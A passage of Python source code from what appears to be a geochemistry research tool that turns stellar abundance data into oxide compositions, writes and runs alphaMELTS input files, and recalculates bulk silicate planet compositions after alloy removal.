547.5, 553.95, 560.53, 567.11, 573.68]
inputfile_list = []
home_dir = []
# star_names = []
# na_h = []
# mg_h = []
# al_h = []
# si_h = []
# ca_h = []
# ti_h = []
# cr_h = []
# fe_h = []
#
# star_index = []
# na_index = []
# mg_index = []
# al_index = []
# si_index = []
# ca_index = []
# ti_index = []
# cr_index = []
# fe_index = []
#
# na_mol_abundances = []
# mg_mol_abundances = []
# al_mol_abundances = []
# si_mol_abundances = []
# ca_mol_abundances = []
# ti_mol_abundances = []
# cr_mol_abundances = []
# fe_mol_abundances = []
def adjustsi_fct(si_pct):
adj_si_pct = si_pct * adjust_si
return adj_si_pct
def adjustna_fct(na_pct):
adj_na_pct = na_pct * adjust_na
return adj_na_pct
def createbspenvfile():
if "BSP_Env_File" in os.listdir(os.getcwd()):
pass
else:
bspenvfile = open("BSP_Env_File", 'w')
one = "!BSP_Environment_File"
two = "ALPHAMELTS_VERSION MELTS"
three = "ALPHAMELTS_MODE isobaric"
four = "ALPHAMELTS_MAXT 3000"
five = "ALPHAMELTS_DELTAT -2"
six = "ALPHAMELTS_MINT 1020"
seven = "ALPHAMELTS_FRACTIONATE_SOLIDS true"
eight = "ALPHAMELTS_CELSIUS_OUTPUT true"
nine = "ALPHAMELTS_SAVE_ALL true"
ten = "ALPHAMELTS_SKIP_FAILURE true"
eleven = "Suppress: alloy-liquid"
bspenvfile.write("{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n".format(one, two, three,
four, five, six, seven, eight, nine,
ten, eleven))
bspenvfile.close()
def createmorbenvfile():
if "MORB_Env_File" in os.listdir(os.getcwd()):
pass
else:
morbenvfile = open("MORB_Env_File", 'w')
one = "!MORB_Environment_File"
two = "ALPHAMELTS_VERSION pMELTS"
three = "ALPHAMELTS_MODE isobaric"
four = "ALPHAMELTS_MAXT 3000"
five = "ALPHAMELTS_DELTAT -2"
six = "ALPHAMELTS_MINT 1000"
seven = "ALPHAMELTS_FRACTIONATE_SOLIDS true"
eight = "ALPHAMELTS_CELSIUS_OUTPUT true"
nine = "ALPHAMELTS_SAVE_ALL true"
ten = "ALPHAMELTS_SKIP_FAILURE true"
eleven = "Suppress: alloy-liquid"
morbenvfile.write("{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n".format(one, two, three,
four, five, six, seven, eight, nine,
ten, eleven))
morbenvfile.close()
def runmelts_bsp(infile_directory, inputfilename):
print("\n[~] Preparing alphaMELTS for BSP calculations...")
if "{}_Completed_BSP_MELTS_Files".format(inputfilename[:-4]) in os.listdir(os.getcwd()):
shutil.rmtree("{}_Completed_BSP_MELTS_Files".format(inputfilename[:-4]))
os.mkdir("{}_Completed_BSP_MELTS_Files".format(inputfilename[:-4]))
else:
os.mkdir("{}_Completed_BSP_MELTS_Files".format(inputfilename[:-4]))
bsp_outdir = (home_dir[0] + "/{}_Completed_BSP_MELTS_Files".format(inputfilename[:-4]))
for i in os.listdir(infile_directory):
os.chdir(home_dir[0])
if "alphaMELTS_tbl.txt" in os.listdir(os.getcwd()):
os.remove("alphaMELTS_tbl.txt")
else:
pass
shutil.copy((infile_directory + "/" + str(i)), (home_dir[0] + "/" + str(i)))
print("[~] Running BSP calculations for: {}".format(i[:-20]))
p = subprocess.Popen(["run_alphamelts.command", "-f", "BSP_Env_File"], stdin=subprocess.PIPE)
t = Timer(300, p.kill)
t.start()
print("\nTimeout timer started. 300 seconds until the loop continues...\n")
p.communicate(input=b"\n".join([b"1", i, b"8", b"alloy-liquid", b"0", b"x", b"5", b"4", b"-1.4", b"2", b"2500", b"4200", b"4", b"1", b"0"]))
t.cancel()
if "alphaMELTS_tbl.txt" in os.listdir(os.getcwd()):
oldname = "alphaMELTS_tbl.txt"
newname = i[:-20] + "_BSP_OUTPUT"
os.rename(oldname, newname)
shutil.move(newname, bsp_outdir + "/{}".format(newname))
os.remove(i)
os.chdir(bsp_outdir)
csv_file_name = newname + ".csv"
with open(newname, 'r') as infile, open(csv_file_name, 'w') as outfile:
in_txt = csv.reader(infile, delimiter=" ")
out_csv = csv.writer(outfile)
out_csv.writerows(in_txt)
infile.close()
outfile.close()
os.remove(newname)
print("[~] {} BSP calculation processed!".format(i[:-20]))
else:
print("\n[X] {} BSP calculation FAILED!".format(i[:-20]))
pass
if i in home_dir[0]:
os.remove(home_dir[0] + "/{}".format(i))
else:
pass
print("[~] Scraping BSP files for alloy abundances...")
return ("{}_Completed_BSP_MELTS_Files".format(inputfilename))
def file_consolidate(path, init_path):
os.chdir(path)
if "EP_Consolidated_Output.csv" is os.listdir(os.getcwd()):
os.remove("EP_Consolidated_Output.csv")
else:
pass
if "EP_Consolidated_Output.csv" is os.listdir(init_path):
os.remove(init_path + "/EP_Consolidated_Output.csv")
else:
pass
outfile = open("EP_Consolidated_Output.csv", 'a')
for i in os.listdir(os.getcwd()):
if i != "EP_Consolidated_Output.csv":
with open(i, 'r') as infile:
reader = csv.reader(infile, delimiter=",")
read_row = []
for row in reader:
for p in row:
read_row.append(p)
writethis = ",".join(str(z) for z in read_row)
outfile.write("{}\n".format(writethis))
os.remove(i)
now_dir = os.getcwd() + "/{}".format("EP_Consolidated_Output.csv")
now_dir2 = os.getcwd()
to_dir = init_path + "/{}".format("EP_Consolidated_Output.csv")
shutil.move(now_dir, to_dir)
os.chdir(init_path)
shutil.rmtree(now_dir2)
print("[~] Consolidated file '{}' has been written!\n(Please see '{}' for your "
"file!)\n".format("EP_Consolidated_Output.csv", init_path))
def logep(infile, infile_type, consol_file, init_path, library):
if "{}_MELTS_{}_Input_Files".format(inputfile_list[0][:-4], infile_type) in os.listdir(os.getcwd()):
shutil.rmtree("{}_MELTS_{}_Input_Files".format(inputfile_list[0][:-4], infile_type))
os.mkdir("{}_MELTS_{}_Input_Files".format(inputfile_list[0][:-4], infile_type))
else:
os.mkdir("{}_MELTS_{}_Input_Files".format(inputfile_list[0][:-4], infile_type))
if "{}_{}_ConsolidatedChemFile.csv".format(infile[:-4], infile_type) in os.listdir(os.getcwd()):
os.remove("{}_{}_ConsolidatedChemFile.csv".format(infile[:-4], infile_type))
else:
pass
chem_outfile = open("{}_{}_ConsolidatedChemFile.csv".format(infile[:-4], infile_type), 'a')
chem_outfile.write("Star,FeO,CaO,Al2O3,Na2O,MgO,SiO2,TiO2,Cr2O3,NiO,Mass_Alloy\n")
# try:
with open(infile, 'r') as inputfile:
if library is True:
print("\n[~] Writing MELTS {} Input Files...".format(infile_type))
else:
print("[~] Preparing consolidated MELTS output file...")
df = pd.DataFrame(pd.read_csv(inputfile))
for index, row in df.iterrows():
star_name = row['Star']
# print(star_name)
# print(row['[Fe/H]'])
# print(row['[Ca/H]'])
# print(row['[Al/H]'])
# print(row['[Na/H]'])
# print(row['[Mg/H]'])
# print(row['[Si/H]'])
# print(row['[Ti/H]'])
# print(row['[Cr/H]'])
# print(row['[Ni/H'])
fe_abundance = (10 ** (row['[Fe/H]'])) * asplund_fe
ca_abundance = (10 ** (row['[Ca/H]'])) * asplund_ca
al_abundance = (10 ** (row['[Al/H]'])) * asplund_al
na_abundance = (10 ** (row['[Na/H]'])) * asplund_na
mg_abundance = (10 ** (row['[Mg/H]'])) * asplund_mg
si_abundance = (10 ** (row['[Si/H]'])) * asplund_si
ti_abundance = (10 ** (row['[Ti/H]'])) * asplund_ti
cr_abundance = (10 ** (row['[Cr/H]'])) * asplund_cr
ni_abundance = (10 ** (row['[Ni/H]'])) * asplund_ni
total_abundances = (fe_abundance + ca_abundance + al_abundance + na_abundance + mg_abundance +
si_abundance + ti_abundance + cr_abundance + ni_abundance)
# print(total_abundances)
init_pct_fe = fe_abundance / total_abundances
init_pct_ca = ca_abundance / total_abundances
init_pct_al = al_abundance / total_abundances
init_pct_na = na_abundance / total_abundances
init_pct_mg = mg_abundance / total_abundances
init_pct_si = si_abundance / total_abundances
init_pct_ti = ti_abundance / total_abundances
init_pct_cr = cr_abundance / total_abundances
init_pct_ni = ni_abundance / total_abundances
init_pct_sum = (init_pct_fe + init_pct_ca + init_pct_al + init_pct_na + init_pct_mg + init_pct_si +
init_pct_ti + init_pct_cr + init_pct_ni)
# print(star_name)
# print(init_pct_fe, init_pct_ca, init_pct_al, init_pct_na, init_pct_mg, init_pct_si,
# init_pct_ti, init_pct_cr, init_pct_ni ,init_pct_sum)
moles_si_remaining = adjustsi_fct(si_pct=init_pct_si)
moles_na_remaining = adjustna_fct(na_pct=init_pct_na)
norm_pct_sum = (init_pct_fe + init_pct_ca + init_pct_al + moles_na_remaining + init_pct_mg +
moles_si_remaining + init_pct_ti + init_pct_cr + init_pct_ni)
norm_pct_fe = init_pct_fe / norm_pct_sum
norm_pct_ca = init_pct_ca / norm_pct_sum
norm_pct_al = init_pct_al / norm_pct_sum
norm_pct_na = moles_na_remaining / norm_pct_sum
norm_pct_mg = init_pct_mg / norm_pct_sum
norm_pct_si = moles_si_remaining / norm_pct_sum
norm_pct_ti = init_pct_ti / norm_pct_sum
norm_pct_cr = init_pct_cr / norm_pct_sum
norm_pct_ni = init_pct_ni / norm_pct_sum
check_norm_sum = (
norm_pct_fe + norm_pct_ca + norm_pct_al + norm_pct_na + norm_pct_mg + norm_pct_si +
norm_pct_ti + norm_pct_cr + norm_pct_ni)
wt_feo = ((norm_pct_fe * fe_atwt) * feo_molwt) / (num_feo_cations * fe_atwt)
wt_cao = ((norm_pct_ca * ca_atwt) * cao_molwt) / (num_cao_cations * ca_atwt)
wt_al2o3 = ((norm_pct_al * al_atwt) * al2o3_molwt) / (num_al2o3_cations * al_atwt)
wt_na2o = ((norm_pct_na * na_atwt) * na2o_molwt) / (num_na2o_cations * na_atwt)
wt_mgo = ((norm_pct_mg * mg_atwt) * mgo_molwt) / (num_mgo_cations * mg_atwt)
wt_sio2 = ((norm_pct_si * si_atwt) * sio2_molwt) / (num_sio2_cations * si_atwt)
wt_tio2 = ((norm_pct_ti * ti_atwt) * tio2_molwt) / (num_tio2_cations * ti_atwt)
wt_cr2o3 = ((norm_pct_cr * cr_atwt) * cr2o3_molwt) / (num_cr2o3_cations * cr_atwt)
wt_nio = ((norm_pct_ni * ni_atwt) * nio_molwt) / (num_nio_cations * ni_atwt)
sum_oxwts = (wt_feo + wt_cao + wt_al2o3 + wt_na2o + wt_mgo + wt_sio2 + wt_tio2 + wt_cr2o3 + wt_nio)
norm_wt_feo = (wt_feo / sum_oxwts) * 100.0
norm_wt_cao = (wt_cao / sum_oxwts) * 100.0
norm_wt_al2o3 = (wt_al2o3 / sum_oxwts) * 100.0
norm_wt_na2o = (wt_na2o / sum_oxwts) * 100.0
norm_wt_mgo = (wt_mgo / sum_oxwts) * 100.0
norm_wt_sio2 = (wt_sio2 / sum_oxwts) * 100.0
norm_wt_tio2 = (wt_tio2 / sum_oxwts) * 100.0
norm_wt_cr2o3 = (wt_cr2o3 / sum_oxwts) * 100.0
norm_wt_nio = (wt_nio / sum_oxwts) * 100.0
norm_wt_sum_check = (norm_wt_feo + norm_wt_cao + norm_wt_al2o3 + norm_wt_na2o + norm_wt_mgo +
norm_wt_sio2 + norm_wt_tio2 + norm_wt_cr2o3 + norm_wt_nio)
# print(star_name)
# print(norm_wt_feo, norm_wt_cao, norm_wt_al2o3, norm_wt_na2o, norm_wt_mgo, norm_wt_sio2,
# norm_wt_tio2, norm_wt_cr2o3, norm_wt_nio, norm_wt_sum_check)
if (star_name + "_MELTS_{}_INFILE.txt".format(infile_type)) in os.listdir(os.getcwd()):
os.remove(star_name + "_MELTS_{}_INFILE.txt".format(infile_type))
else:
pass
melts_input_file = open(star_name + "_MELTS_{}_INFILE.txt".format(infile_type), 'w')
title = "Title: {}".format(star_name)
initfeo = "Initial Composition: FeO {}".format(norm_wt_feo)
initcao = "Initial Composition: Cao {}".format(norm_wt_cao)
inital2o3 = "Initial Composition: Al2O3 {}".format(norm_wt_al2o3)
initna2o = "Initial Composition: Na2O {}".format(norm_wt_na2o)
initmgo = "Initial Composition: MgO {}".format(norm_wt_mgo)
initsio2 = "Initial Composition: SiO2 {}".format(norm_wt_sio2)
inittio2 = "Initial Composition: TiO2 {}".format(norm_wt_tio2)
initcr2o3 = "Initial Composition: Cr2O3 {}".format(norm_wt_cr2o3)
initnio = "Initial Composition: NiO {}".format(norm_wt_nio)
init_temp = 'Initial Temperature: 2000'
final_temp = "Final Temperature: 800"
inc_temp = "Increment Temperature: -5"
init_press = "Initial Pressure: 500"
final_press = "Final Pressure: 500"
dpdt = "dp/dt: 0"
mode = "Mode: Fractionate Solids"
mode2 = "Mode: Isobaric"
melts_input_file.write(
"{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n".format(title,
initfeo,
initcao,
inital2o3,
initna2o,
initmgo,
initsio2,
inittio2,
initcr2o3,
initnio,
init_temp,
final_temp,
inc_temp,
init_press,
final_press,
dpdt, mode,
mode2))
melts_input_file.close()
shutil.move((os.getcwd() + "/" + star_name + "_MELTS_{}_INFILE.txt".format(infile_type)),
(os.getcwd() + "/{}_MELTS_{}_Input_Files/".format(inputfile_list[0][:-4], infile_type)
+ star_name + "_MELTS_{}_INFILE.txt".format(infile_type)))
chem_outfile.write("{},{},{},{},{},{},{},{},{},{}\n".format(star_name, norm_wt_feo, norm_wt_cao, norm_wt_al2o3,
norm_wt_na2o, norm_wt_mgo, norm_wt_sio2, norm_wt_tio2, norm_wt_cr2o3, norm_wt_nio))
chem_outfile.close()
if library is True:
infiledir = (os.getcwd() + "/{}_MELTS_{}_Input_Files/".format(inputfile_list[0][:-4], infile_type))
print("[~] MELTS {} Input Files Written!".format(infile_type))
print("[~] MELTS files stored in {}".format(infiledir))
else:
pass
infiledir = (os.getcwd() + "/{}_MELTS_{}_Input_Files/".format(inputfile_list[0][:-4], infile_type))
print("[~] Launching alphaMELTS for {} Calculations...".format(infile_type))
runmelts_bsp(infile_directory=infiledir, inputfilename=infile)
chem_outfile.close()
if consol_file is True:
file_consolidate(path=infiledir, init_path=init_path)
else:
file_consolidate(path=infiledir, init_path=init_path)
scrapebsp2(infiledirectory=(home_dir[0] + "/{}_Completed_BSP_MELTS_Files".format(infile[:-4])),
inputfilename=infile)
bsprecalc(bspmeltsfilesdir=(home_dir[0] + "{}_Completed_BSP_MELTS_Files".format(infile[:-4])),
infilename=infile, alloy_mass_infile="alloy_mass.csv",
bsp_chem_infile="{}_{}_ConsolidatedChemFile.csv".format(infile[:-4], infile_type))
# except:
# # raise Exception
# print("\nError! There is likely an issue with the formatting of your input file!\n"
# "Please refer to the documentation for more information.\n")
# time.sleep(8)
# initialization()
#
# sys.exit()
def molepct(infile, infile_type, consol_file, init_path, library):
if "{}_MELTS_{}_Input_Files".format(inputfile_list[0][:-4], infile_type) in os.listdir(os.getcwd()):
shutil.rmtree("{}_MELTS_{}_Input_Files".format(inputfile_list[0][:-4], infile_type))
os.mkdir("{}_MELTS_{}_Input_Files".format(inputfile_list[0][:-4], infile_type))
else:
os.mkdir("{}_MELTS_{}_Input_Files".format(inputfile_list[0][:-4], infile_type))
if "{}_{}_ConsolidatedChemFile.csv".format(infile[:-4], infile_type) in os.listdir(os.getcwd()):
os.remove("{}_{}_ConsolidatedChemFile.csv".format(infile[:-4], infile_type))
else:
pass
chem_outfile = open("{}_{}_ConsolidatedChemFile.csv".format(infile[:-4], infile_type), 'a')
chem_outfile.write("Star,FeO,CaO,Al2O3,Na2O,MgO,SiO2,TiO2,Cr2O3,NiO,Mass_Alloy\n")
# try:
with open(infile, 'r') as inputfile:
if library is True:
print("\n[~] Writing MELTS {} Input Files...".format(infile_type))
else:
print("[~] Preparing consolidated MELTS output file...")
df = pd.DataFrame(pd.read_csv(inputfile))
for index, row in df.iterrows():
star_name = row['Star']
# print(star_name)
# print(row['[Fe/H]'])
# print(row['[Ca/H]'])
# print(row['[Al/H]'])
# print(row['[Na/H]'])
# print(row['[Mg/H]'])
# print(row['[Si/H]'])
# print(row['[Ti/H]'])
# print(row['[Cr/H]'])
# print("\n\n_________________________________________\n")
# print(star_name)
fe_abundance = row['Fe']
ca_abundance = row['Ca']
al_abundance = row['Al']
na_abundance = row['Na']
mg_abundance = row['Mg']
si_abundance = row['Si']
ti_abundance = row['Ti']
cr_abundance = row['Cr']
ni_abundance = row['Ni']
total_abundances = (fe_abundance + ca_abundance + al_abundance + na_abundance + mg_abundance +
si_abundance + ti_abundance + cr_abundance + ni_abundance)
# print("Input abundances:")
# print(fe_abundance, ca_abundance, al_abundance, na_abundance, mg_abundance, si_abundance,
# ti_abundance, cr_abundance, ni_abundance, total_abundances)
# print(total_abundances)
init_pct_fe = fe_abundance / total_abundances
init_pct_ca = ca_abundance / total_abundances
init_pct_al = al_abundance / total_abundances
init_pct_na = na_abundance / total_abundances
init_pct_mg = mg_abundance / total_abundances
init_pct_si = si_abundance / total_abundances
init_pct_ti = ti_abundance / total_abundances
init_pct_cr = cr_abundance / total_abundances
init_pct_ni = ni_abundance / total_abundances
init_pct_sum = (init_pct_fe + init_pct_ca + init_pct_al + init_pct_na + init_pct_mg + init_pct_si +
init_pct_ti + init_pct_cr + init_pct_ni)
# print("Init Cation%:")
# print(init_pct_fe, init_pct_ca, init_pct_al, init_pct_na, init_pct_mg, init_pct_si,
# init_pct_ti, init_pct_cr, init_pct_sum)
moles_si_remaining = adjustsi_fct(si_pct=init_pct_si)
moles_na_remaining = adjustna_fct(na_pct=init_pct_na)
#
# print("Moles Si/Na Remaining:")
# print(moles_si_remaining, moles_na_remaining)
norm_pct_sum = (init_pct_fe + init_pct_ca + init_pct_al + moles_na_remaining + init_pct_mg +
moles_si_remaining + init_pct_ti + init_pct_cr + init_pct_ni)
norm_pct_fe = init_pct_fe / norm_pct_sum
norm_pct_ca = init_pct_ca / norm_pct_sum
norm_pct_al = init_pct_al / norm_pct_sum
norm_pct_na = moles_na_remaining / norm_pct_sum
norm_pct_mg = init_pct_mg / norm_pct_sum
norm_pct_si = moles_si_remaining / norm_pct_sum
norm_pct_ti = init_pct_ti / norm_pct_sum
norm_pct_cr = init_pct_cr / norm_pct_sum
norm_pct_ni = init_pct_ni / norm_pct_sum
check_norm_sum = (
norm_pct_fe + norm_pct_ca + norm_pct_al + norm_pct_na + norm_pct_mg + norm_pct_si +
norm_pct_ti + norm_pct_cr + norm_pct_ni)
# print("Normalized Cation% After Si/Na Correction:")
# print(norm_pct_fe, norm_pct_ca, norm_pct_al, norm_pct_na, norm_pct_mg, norm_pct_si, norm_pct_ti,
# norm_pct_cr, norm_pct_ni, norm_pct_sum)
wt_feo = ((norm_pct_fe * fe_atwt) * feo_molwt) / (num_feo_cations * fe_atwt)
wt_cao = ((norm_pct_ca * ca_atwt) * cao_molwt) / (num_cao_cations * ca_atwt)
wt_al2o3 = ((norm_pct_al * al_atwt) * al2o3_molwt) / (num_al2o3_cations * al_atwt)
wt_na2o = ((norm_pct_na * na_atwt) * na2o_molwt) / (num_na2o_cations * na_atwt)
wt_mgo = ((norm_pct_mg * mg_atwt) * mgo_molwt) / (num_mgo_cations * mg_atwt)
wt_sio2 = ((norm_pct_si * si_atwt) * sio2_molwt) / (num_sio2_cations * si_atwt)
wt_tio2 = ((norm_pct_ti * ti_atwt) * tio2_molwt) / (num_tio2_cations * ti_atwt)
wt_cr2o3 = ((norm_pct_cr * cr_atwt) * cr2o3_molwt) / (num_cr2o3_cations * cr_atwt)
wt_nio = ((norm_pct_ni * ni_atwt) * nio_molwt) / (num_nio_cations * ni_atwt)
sum_oxwts = (wt_feo + wt_cao + wt_al2o3 + wt_na2o + wt_mgo + wt_sio2 + wt_tio2 + wt_cr2o3 + wt_nio)
# print("Wt Oxides:")
# print(wt_feo, wt_cao, wt_al2o3, wt_na2o, wt_mgo, wt_sio2, wt_tio2, wt_cr2o3, wt_nio, sum_oxwts)
norm_wt_feo = (wt_feo / sum_oxwts) * 100.0
norm_wt_cao = (wt_cao / sum_oxwts) * 100.0
norm_wt_al2o3 = (wt_al2o3 / sum_oxwts) * 100.0
norm_wt_na2o = (wt_na2o / sum_oxwts) * 100.0
norm_wt_mgo = (wt_mgo / sum_oxwts) * 100.0
norm_wt_sio2 = (wt_sio2 / sum_oxwts) * 100.0
norm_wt_tio2 = (wt_tio2 / sum_oxwts) * 100.0
norm_wt_cr2o3 = (wt_cr2o3 / sum_oxwts) * 100.0
norm_wt_nio = (wt_nio / sum_oxwts) * 100.0
norm_wt_sum_check = (norm_wt_feo + norm_wt_cao + norm_wt_al2o3 + norm_wt_na2o + norm_wt_mgo +
norm_wt_sio2 + norm_wt_tio2 + norm_wt_cr2o3 + norm_wt_nio)
# print(star_name)
# print(norm_wt_feo, norm_wt_cao, norm_wt_al2o3, norm_wt_na2o, norm_wt_mgo, norm_wt_sio2,
# norm_wt_tio2, norm_wt_cr2o3, norm_wt_nio, norm_wt_sum_check)
if (star_name + "_MELTS_{}_INFILE.txt") in os.listdir(os.getcwd()):
os.remove(star_name + "_MELTS_{}_INFILE.txt".format(infile_type))
else:
pass
melts_input_file = open(star_name + "_MELTS_{}_INFILE.txt".format(infile_type), 'w')
title = "Title: {}".format(star_name)
initfeo = "Initial Composition: FeO {}".format(norm_wt_feo)
initcao = "Initial Composition: Cao {}".format(norm_wt_cao)
inital2o3 = "Initial Composition: Al2O3 {}".format(norm_wt_al2o3)
initna2o = "Initial Composition: Na2O {}".format(norm_wt_na2o)
initmgo = "Initial Composition: MgO {}".format(norm_wt_mgo)
initsio2 = "Initial Composition: SiO2 {}".format(norm_wt_sio2)
inittio2 = "Initial Composition: TiO2 {}".format(norm_wt_tio2)
initcr2o3 = "Initial Composition: Cr2O3 {}".format(norm_wt_cr2o3)
initnio = "Initial Composition: NiO {}".format(norm_wt_nio)
init_temp = 'Initial Temperature: 2000'
final_temp = "Final Temperature: 800"
inc_temp = "Increment Temperature: -5"
init_press = "Initial Pressure: 500"
final_press = "Final Pressure: 500"
dpdt = "dp/dt: 0"
mode = "Mode: Fractionate Solids"
mode2 = "Mode: Isobaric"
melts_input_file.write(
"{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n".format(title,
initfeo,
initcao,
inital2o3,
initna2o,
initmgo,
initsio2,
inittio2,
initcr2o3,
initnio,
init_temp,
final_temp,
inc_temp,
init_press,
final_press,
dpdt, mode,
mode2))
chem_outfile.write(
"{},{},{},{},{},{},{},{},{},{}\n".format(star_name, norm_wt_feo, norm_wt_cao, norm_wt_al2o3,
norm_wt_na2o, norm_wt_mgo, norm_wt_sio2, norm_wt_tio2,
norm_wt_cr2o3, norm_wt_nio))
melts_input_file.close()
shutil.move((os.getcwd() + "/" + star_name + "_MELTS_{}_INFILE.txt".format(infile_type)),
(os.getcwd() + "/{}_MELTS_{}_Input_Files/".format(inputfile_list[0][:-4], infile_type)
+ star_name + "_MELTS_{}_INFILE.txt".format(infile_type)))
infiledir = os.getcwd() + "/{}_MELTS_{}_Input_Files/".format(inputfile_list[0][:-4], infile_type)
if library is True:
print("[~] MELTS {} Input Files Written!".format(infile_type))
print("[~] MELTS files stored in " + (os.getcwd()))
else:
pass
# print("[~] Launching alphaMELTS for {} Calculations...".format(infile_type))
infiledir = (os.getcwd() + "/{}_MELTS_{}_Input_Files/".format(inputfile_list[0][:-4], infile_type))
print("[~] Launching alphaMELTS for {} Calculations...".format(infile_type))
runmelts_bsp(infile_directory=infiledir, inputfilename=infile)
chem_outfile.close()
if consol_file is True:
file_consolidate(path=infiledir, init_path=init_path)
else:
file_consolidate(path=infiledir, init_path=init_path)
scrapebsp2(infiledirectory=(home_dir[0] + "/{}_Completed_BSP_MELTS_Files".format(infile[:-4])), inputfilename=infile)
bsprecalc(bspmeltsfilesdir=(home_dir[0] + "{}_Completed_BSP_MELTS_Files".format(infile[:-4])),
infilename=infile, alloy_mass_infile="alloy_mass.csv",
bsp_chem_infile="{}_{}_ConsolidatedChemFile.csv".format(infile[:-4], infile_type))
# except:
# raise Exception
# # print("\nError! There is likely an issue with the formatting of your input file!\n"
# # "Please refer to the documentation for more information.\n")
# time.sleep(8)
# initialization()
# sys.exit()
def bsprecalc(bspmeltsfilesdir, infilename, alloy_mass_infile, bsp_chem_infile):
if "{}_BSP_Composition.csv".format(infilename[:-4]) in os.listdir(home_dir[0]):
os.remove(home_dir[0] + "/{}_BSP_Composition.csv".format(infilename[:-4]))
bsp_chemfile = open("{}_BSP_Composition.csv".format(infilename[:-4]), 'a')
bsp_comp_header = "Star,FeO,Na2O,MgO,Al2O3,SiO2,CaO,TiO2,Cr2O3"
bsp_chemfile.write("{}\n".format(bsp_comp_header))
if "bsp_debug.csv" in os.listdir(os.getcwd()):
os.remove("bsp_debug.csv")
bsp_debug = open("bsp_debug.csv", 'a')
if os.path.exists(home_dir[0] + "/MELTS_MORB_Input_Files"):
shutil.rmtree(home_dir[0] + "/MELTS_MORB_Input_Files")
else:
pass
os.mkdir(home_dir[0] + "/MELTS_MORB_Input_Files")
# need to build in the MELTS file parser to extract alloy info
# construct it so that it extracts alloy and chemistry, and the write to file with predictable headers
# for i in os.listdir(os.getcwd()):
df_chem = pd.read_csv(bsp_chem_infile)
df_alloy = pd.read_csv(alloy_mass_infile)
for row in df_chem.index:
try:
# print(df_chem)
# print(df_chem.index)
star_name = df_chem['Star'][row]
feo_in = df_chem['FeO'][row]
na2o_in = df_chem['Na2O'][row]
mgo_in = df_chem['MgO'][row]
al2o3_in = df_chem['Al2O3'][row]
sio2_in = df_chem['SiO2'][row]
cao_in = df_chem['CaO'][row]
nio_in = df_chem['NiO'][row]
tio2_in = df_chem['TiO2'][row]
cr2o3_in = df_chem['Cr2O3'][row]
in1_header = "1,feo,na2o,mgo,al2o3,sio2,cao,nio,tio2,cr2o3"
in1 = ",{},{},{},{},{},{},{},{},{}".format(feo_in, na2o_in, mgo_in, al2o3_in, sio2_in, cao_in, nio_in, tio2_in, cr2o3_in)
bsp_debug.write("{}\n{}\n".format(in1_header, in1))
for row in df_alloy.index:
star_name2 = df_alloy['star'][row]
alloy_mass = df_alloy['alloy mass'][row]
if star_name == star_name2:
feo_moles = feo_in / feo_molwt
na2o_moles = na2o_in / na2o_molwt
mgo_moles = mgo_in / mgo_molwt
al2o3_moles = al2o3_in / al2o3_molwt
sio2_moles = sio2_in / sio2_molwt
cao_moles = cao_in / cao_molwt
nio_moles = nio_in / nio_molwt
tio2_moles = tio2_in / tio2_molwt
cr2o3_moles = cr2o3_in / cr2o3_molwt
in2_header = "2,feo,na2o,mgo,al2o3,sio2,cao,nio,tio2,cr2o3"
in2 = ",{},{},{},{},{},{},{},{},{}".format(feo_moles, na2o_moles, mgo_moles, al2o3_moles, sio2_moles, cao_moles, nio_moles, tio2_moles, cr2o3_moles)
bsp_debug.write("{}\n{}\n".format(in2_header, in2))
fe_moles = feo_moles * num_feo_cations
na_moles = na2o_moles * num_na2o_cations
mg_moles = mgo_moles * num_mgo_cations
al_moles = al2o3_moles * num_al2o3_cations
si_moles = sio2_moles * num_sio2_cations
ca_moles = cao_moles * num_cao_cations
ni_moles = nio_moles * num_nio_cations
ti_moles = tio2_moles * num_tio2_cations
cr_moles = cr2o3_moles * num_cr2o3_cations
in3_header = "3,fe,na,mg,al,si,ca,ni,ti,cr"
in3 = ",{},{},{},{},{},{},{},{},{}".format(fe_moles, na_moles, mg_moles, al_moles,
si_moles, ca_moles, ni_moles, ti_moles, cr_moles)
bsp_debug.write("{}\n{}\n".format(in3_header, in3))
fe_mass = fe_moles * fe_atwt
na_mass = na_moles * na_atwt
mg_mass = mg_moles * mg_atwt
al_mass = al_moles * al_atwt
si_mass = si_moles * si_atwt
ca_mass = ca_moles * ca_atwt
ni_mass = ni_moles * ni_atwt
ti_mass = ti_moles * ti_atwt
cr_mass = cr_moles * cr_atwt
in4_header = "4,fe,na,mg,al,si,ca,ni,ti,cr"
in4 = ",{},{},{},{},{},{},{},{},{}".format(fe_mass, na_mass, mg_mass, al_mass,
si_mass, ca_mass, ni_mass, ti_mass, cr_mass)
bsp_debug.write("{}\n{}\n".format(in4_header, in4))
alloy_subt_ni_mass = alloy_mass - ni_mass
if alloy_subt_ni_mass < 0:
print("Ni MASS ERROR!")
sys.exit()
else:
pass
new_mass_fe = fe_mass - alloy_subt_ni_mass
if new_mass_fe < 0:
print("Fe MASS ERROR!")
sys.exit()
remaining_moles_fe = new_mass_fe / fe_atwt
remaining_moles_feo = remaining_moles_fe * num_feo_cations
remaining_mass_feo = remaining_moles_feo * feo_molwt
in5_header = "5,alloy_but_ni_mass,new_mass_fe,remaining_moles_fe,remaining_moles_feo,remaining_mass_feo"
in5 = ",{},{},{},{},{}".format(alloy_subt_ni_mass, new_mass_fe, remaining_moles_fe, remaining_moles_feo,
remaining_mass_feo)
bsp_debug.write("{}\n{}\n".format(in5_header, in5))
unnormalized_sum = (remaining_mass_feo + na2o_in + mgo_in + al2o3_in + sio2_in + cao_in +
tio2_in + cr2o3_in)
norm_feo = remaining_mass_feo / unnormalized_sum * 100.0
norm_na2o = na2o_in / unnormalized_sum * 100.0
norm_mgo = mgo_in / unnormalized_sum * 100.0
norm_al2o3 = al2o3_in / unnormalized_sum * 100.0
norm_sio2 = sio2_in / unnormalized_sum * 100.0
norm_cao = cao_in / unnormalized_sum * 100.0
norm_tio2 = tio2_in / unnormalized_sum * 100.0
norm_cr2o3 = cr2o3_in / unnormalized_sum * 100.0
norm_sum = norm_feo + norm_na2o + norm_mgo + norm_al2o3 + norm_sio2 + norm_cao + norm_tio2 + norm_cr2o3
in6_header = "6,feo,na2o,mgo,al2o3,sio2,cao,tio2,cr2o3,unnorm_sum,norm_sum"
